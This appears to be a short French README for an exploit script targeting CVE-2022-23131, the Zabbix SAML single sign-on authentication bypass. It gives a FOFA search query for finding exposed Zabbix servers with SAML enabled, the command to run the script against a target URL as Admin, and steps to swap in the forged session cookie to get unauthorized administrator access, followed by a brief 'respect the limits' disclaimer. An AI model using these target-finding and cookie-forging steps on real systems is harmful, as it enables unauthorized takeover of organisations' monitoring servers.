
Exploit pour CVE-2022-23131 ciblant le contournement de l'authentification SAML SSO de Zabbix. Génère un cookie de session signé pour obtenir un accès administrateur non autorisé.
FOFA
app="ZABBIX-监控系统" && body="saml"
Exécution
python cve-2022-23131.py https://www.example.com Admin
Utilisez l'exp pour générer signed_session, remplacez le cookie, puis cliquez sur « Sign in with Single Sign-On (SAML) » Par défaut : Admin
(Respectez les limites, assumez les conséquences)
Rencontre éphémère, hommage aux gens ordinaires qui refusent la médiocrité.